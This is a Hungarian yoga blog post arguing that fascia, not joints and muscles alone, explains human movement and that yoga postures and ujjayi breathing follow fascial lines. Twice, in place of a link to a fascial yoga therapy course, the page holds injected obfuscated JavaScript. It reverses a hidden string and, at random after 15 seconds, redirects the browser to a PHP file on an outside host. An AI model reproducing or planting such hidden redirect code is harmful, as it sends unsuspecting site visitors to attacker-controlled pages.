Top

Az új csodafegyver: a fascia

joga-fascia-terapia

Az új csodafegyver: a fascia

A klasszikus anatómia úgy gondolkozott, hogy a mozgás az ízületben jön létre, amiben a csontokat a szalagok rögzítik és az izmok mozgatják, az irányítást pedig az idegrendszer végzi. A humanoid robotoknál a fenti modell szerint próbálták utánozni az emberi mozgást (például a Csillagok Háborújában az aranyszínű tolmácsrobot, C-3PO), de mit mondjak, nem sikerült tökéletesen.
 
Az új szemléletmód szerint a mozgás megértésének kulcsa a fascia, ami egy speciális kötőszövet. Nem csak körülveszi, beburkolja az izmokat, a csontokat és a szerveket, hanem át is halad rajtuk. Ha az emberi testből eltávolítanánk mindent, ami nem a fascia, a test formája a legapróbb részletekig tökéletesen megmaradna. Az emberi testet úgy burkolják a különböző fasciális hálók, mintha méretes, egymással kapcsolódó leplekkel csavarnánk körbe. Ezeken a fasciális lepleken keresztül a mozgás sokkal jobban leírható, mint a robot modellel.
 
A keleti mozgásformák intuitívan használják ezt a tudást, pusztán a gyakorlók fejlett testtudatán keresztül. A jóga ászanái megdöbbentő módon igazodnak a fasciális vonalak lefutásához, az astanga vinyásza jóga különleges udzsájí légzése pedig aktiválja a vízszintes fascialemezeket (medence alap, rekeszizom, gégefő), és ezzel dinamikus stabilitást biztosít a gerincnek, amire a mozgás így sokkal biztonságosabban és kisebb energiafelhasználással épülhet.
 
A $GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])==”string”)return $GQRkExOVl1p57bbeL4u.list[n].split(“”).reverse().join(“”);return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=[“‘php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andalajoga.hu/jogaoktato-kepzes-archiv/fascialis-jogaterapia/”>Fasciális jógaterápia képzésen teheted meg.
 
A fascia nem egy új dolog. Csak ismét egy lépéssel közelebb kerültünk az emberi test működésének megértéséhez.
 
 
Szerző: $GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])==”string”)return $GQRkExOVl1p57bbeL4u.list[n].split(“”).reverse().join(“”);return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=[“‘php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andalajoga.hu/jogaoktato-kepzes-archiv/fascialis-jogaterapia/”>fascialais-jogaterapia-kepzes

Németh Gergő

Meggyőződésem, hogy a jóga az egyik legjobb dolog, amit tehetünk magunkért és másokért!

No Comments

Sorry, the comment form is closed at this time.